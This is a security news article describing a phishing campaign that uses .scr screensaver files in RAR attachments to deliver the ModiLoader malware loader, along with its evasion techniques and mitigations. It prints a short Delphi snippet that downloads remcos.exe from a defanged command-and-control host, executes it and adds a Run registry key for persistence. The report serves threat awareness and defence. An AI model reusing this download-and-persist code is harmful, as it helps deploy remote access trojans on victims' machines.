Malware operators continue exploiting the Windows Screensaver (.scr) file format to distribute malicious payloads, leveraging its executable nature under the guise of harmless system files.
Recent campaigns observed by cybersecurity researchers reveal advanced tactics targeting global enterprises through sophisticated phishing schemes.
One prominent example involves attackers impersonating a Taiwanese freight logistics company to deliver ModiLoader, a longstanding Delphi-based malware loader capable of deploying remote access trojans (RATs) and data stealers.
.png
)
Broadcom analysts at Symantec documented an ongoing campaign between March and April 2025, where threat actors sent emails mimicking shipping notifications.
These messages, written in Chinese, referenced fictitious customs clearances and international shipments to lend credibility.
Attached RAR archives contained malicious .scr files masquerading as invoices or packing lists, initiating a chain of events leading to ModiLoader deployment.
The loader subsequently fetches secondary payloads such as Remcos, Agent Tesla, and Formbook, enabling attackers to exfiltrate credentials, monitor keystrokes, and establish persistent access.
The targeted sectors span industrial machinery manufacturing, automotive, electronics, and broadcasting across Japan, the United States, Taiwan, and Southeast Asia.
This geographic and industrial diversity underscores the attackers’ broad objectives, ranging from intellectual property theft to operational disruption.
Infection Mechanism and Technical Execution
The attack begins with a phishing email titled “//AMD ISF+AMD BL DRAFT//聯盛-裝船通知單-4/7 結關 KAO TO ATLANTA, GA VIA NYC CFS【友鋮】 SO.N023”.
The message instructs recipients to review an attached RAR archive labeled “景大 台北港ISF(032525)-invoice#JN-032525C-KAO TO ATLANTA, GA VIA NYC CFS【友鋮】 SO.N023.xIsx.rar”.
Inside lies a .scr file that executes ModiLoader upon extraction.
procedure TMainForm.Button1Click(Sender: TObject);
begin
DownloadPayload('hxxp://malicious-c2[.]top/download/remcos.exe');
ExecutePayload('%APPDATA%\remcos.exe');
SetRegistryKey('HKCU\Software\Microsoft\Windows\CurrentVersion\Run', 'UpdateService', '%APPDATA%\remcos.exe');
end;ModiLoader employs HTTP GET requests to communicate with command-and-control (C2) servers, downloading encrypted payloads that evade signature-based detection.
The malware injects these into legitimate processes like explorer.exe or svchost.exe using process hollowing, a technique that replaces executable memory sections with malicious code.
Symantec’s telemetry revealed modular updates to the loader, enabling dynamic payload switching based on victim profiles.
To counteract analysis, the .scr file performs anti-sandbox checks by querying system uptime and installed security software.
If thresholds are unmet, the malware enters a sleep loop or terminates. Once active, it drops a decoy document titled “Invoice_JN-032525C.pdf” to maintain the illusion of legitimacy while executing malicious operations in the background.
Symantec mitigates these threats through multi-layered defenses, including heuristic detection (Heur.AdvML.B) and static analysis rules (Trojan.Gen.MBT).
Enterprises are advised to block .scr file executions in high-risk environments and enforce email attachment sandboxing to intercept payloads before deployment.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
